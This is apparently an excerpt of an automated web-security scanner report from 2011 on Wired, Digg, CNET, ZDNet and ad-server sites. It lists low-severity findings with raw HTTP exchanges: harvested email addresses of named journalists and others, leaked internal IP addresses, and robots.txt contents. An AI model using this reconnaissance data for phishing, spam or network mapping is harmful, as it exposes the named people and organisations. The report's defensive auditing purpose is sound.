Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:40 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.135. http://www.wired.com/threatlevel/tag/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:30 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=443
Expires: Wed, 12 Jan 2011 15:43:03 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.136. http://www.wired.com/threatlevel/tag/twitter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/twitter/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:54:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=459
Expires: Wed, 12 Jan 2011 15:43:21 GMT
Date: Wed, 12 Jan 2011 15:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.137. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/virginia-tech-shootings/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:06:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:43:41 GMT
Date: Wed, 12 Jan 2011 15:35:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.138. http://www.wired.com/threatlevel/tag/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/wikileaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:45 GMT
Date: Wed, 12 Jan 2011 15:35:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.139. http://www.wired.com/underwire/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/underwire/

Issue detail

The following email addresses were disclosed in the response:

angela_watercutter@wiredmag.com
eraserheadz@gmail.com
hmhart@pacbell.net
hugh.hart@att.net
johnscottlewinski@mac.com
loresjoberg@wired.com
lwallace@wired.com
wired@morphizm.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:02:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=337
Expires: Wed, 12 Jan 2011 05:10:05 GMT
Date: Wed, 12 Jan 2011 05:04:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:eraserheadz@gmail.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:hugh.hart@att.net">
...[SNIP]...
<a href="mailto:eraserheadz@gmail.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:hugh.hart@att.net">
...[SNIP]...
<a href="mailto:loresjoberg@wired.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:hmhart@pacbell.net">
...[SNIP]...
<a
href="mailto:johnscottlewinski@mac.com">
...[SNIP]...
<a href="mailto:wired@morphizm.com">
...[SNIP]...
<a
href="mailto:angela_watercutter@wiredmag.com">
...[SNIP]...

18.140. http://www.wired.com/wiredscience/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/wiredscience/

Issue detail

The following email addresses were disclosed in the response:

betsy_mason@wired.com
brandon@earthlab.net
dave_mosher@wired.com
justarikia@gmail.com
ligrossman@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:27:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=305
Expires: Wed, 12 Jan 2011 05:10:25 GMT
Date: Wed, 12 Jan 2011 05:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:dave_mosher@wired.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:ligrossman@gmail.com">
...[SNIP]...
<a href="mailto:betsy_mason@wired.com">
...[SNIP]...
<a href="mailto:dave_mosher@wired.com">
...[SNIP]...
<a href="mailto:ligrossman@gmail.com">
...[SNIP]...
<a href="mailto:dave_mosher@wired.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:ligrossman@gmail.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:betsy_mason@wired.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:justarikia@gmail.com">
...[SNIP]...

19. Private IP addresses disclosed previous next
There are 4 instances of this issue:

http://digg.com/submit
http://download.cnet.com/8301-2007_4-20027809-12.html/
http://download.cnet.com/8618-2007_4-20027809.html
http://www.zdnet.com/

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

19.1. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.130.26

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.130.26 Build: 188 - Thu Dec 30 14:58:47 PST 2010">
...[SNIP]...

19.2. http://download.cnet.com/8301-2007_4-20027809-12.html/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.16.180.54

Request

Response

19.3. http://download.cnet.com/8618-2007_4-20027809.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8618-2007_4-20027809.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.16.180.54

Request

Response

19.4. http://www.zdnet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zdnet.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.15.4.104

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:08:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 117305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/POS=
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/POS=
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/POS=
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/POS=
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/PAGE
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/PAGE
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/PAGE
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/PAGE
...[SNIP]...
<!-- php client madison [r20100514-1345-c13VipDvarTagSvn]: 10.15.4.104 GET /html/BRAND=2/CELT=html/CID=0/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10/CNET%2dPAGE%2dGUID=L4wloQoPOJAAAFPfax4AAABD/DVAR_TAG=/DVAR_FIRSTPAGE=1/HTTP_HOST=www.zdnet.com/HUB=cn/NCAT=10%3A/PAGE
...[SNIP]...

20. Robots.txt file previous next
There are 10 instances of this issue:

http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json
http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel
http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink
http://adlog.com.com/adlog/i/r=10004&sg=484676&o=20%253a2007%253aB12%253a2014%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=8301&nd=2007&pid=&cid=20027809&pp=100&e=3&rqid=01phx1-ad-e18:4D29F45D3ECF7C&orh=packetstormsecurity.org&ort=&oepartner=&epartner=&ppartner=&pdom=packetstormsecurity.org&cpnmodule=&count=&ra=173.193.214.243&dvar=dvar%255flb%255fmpu%253d1%2523dvar%255ftag%253dSmart%2520Protection%253bparental%2520control%253bTrend%2520Micro%2523dvar%255fversion%253d2008&ucat_rsi=%2526&pg=8WzIBQoOYJAAADD4JyUAAADs&t=2011.01.09.21.57.52/http://i.i.com.com/cnwk.1d/Ads/11732/10/728x90righteousSD123.gif
http://b.scorecardresearch.com/b
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml
http://www.walmart.com/x22
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw
http://www.websitedescription.com/msn.whitepages.com

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

20.1. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.crwdcntrl.net
Path:	/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Thu, 15 Jul 2010 15:31:44 GMT
ETag: "7a8311-1a-48b6eccb63800"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

20.2. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wiredcom.dart/threatlevel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 14:31:04 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

20.3. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/adj/reg.misc.4159/textlink

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adlog.com.com
Path:	/adlog/i/r=10004&sg=484676&o=20%253a2007%253aB12%253a2014%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=8301&nd=2007&pid=&cid=20027809&pp=100&e=3&rqid=01phx1-ad-e18:4D29F45D3ECF7C&orh=packetstormsecurity.org&ort=&oepartner=&epartner=&ppartner=&pdom=packetstormsecurity.org&cpnmodule=&count=&ra=173.193.214.243&dvar=dvar%255flb%255fmpu%253d1%2523dvar%255ftag%253dSmart%2520Protection%253bparental%2520control%253bTrend%2520Micro%2523dvar%255fversion%253d2008&ucat_rsi=%2526&pg=8WzIBQoOYJAAADD4JyUAAADs&t=2011.01.09.21.57.52/http://i.i.com.com/cnwk.1d/Ads/11732/10/728x90righteousSD123.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adlog.com.com

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:28 GMT
Server: Apache/2.2
Last-Modified: Thu, 18 Nov 2010 20:04:09 GMT
Accept-Ranges: bytes
Content-Length: 3614
Keep-Alive: timeout=15, max=924
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/ops/config/global/w/robots.txt,v $
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /av/
Disallow: /css/
Disal
...[SNIP]...

20.5. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

20.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

20.7. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/issues/cloud-computing/index.jhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pwc.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Sat, 20 Mar 2010 00:09:16 GMT
ETag: "20-18b-464fe4bd"
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/plain
Date: Tue, 11 Jan 2011 14:34:58 GMT
Content-Length: 395
Connection: close

User-agent: Yandex
Disallow: /ru*/ru/*/executive$
Disallow: /ru*/ru/$
Disallow: /ru*/ru/*/logistics$
Disallow: /ru*/ru/*/ifrs-us-gaap$
Disallow: /ru*/ru/*/training$
Host: www.pwc.com

User-a
...[SNIP]...

20.8. http://www.walmart.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/x22

Issue detail

The web server contains a robots.txt file.

Request

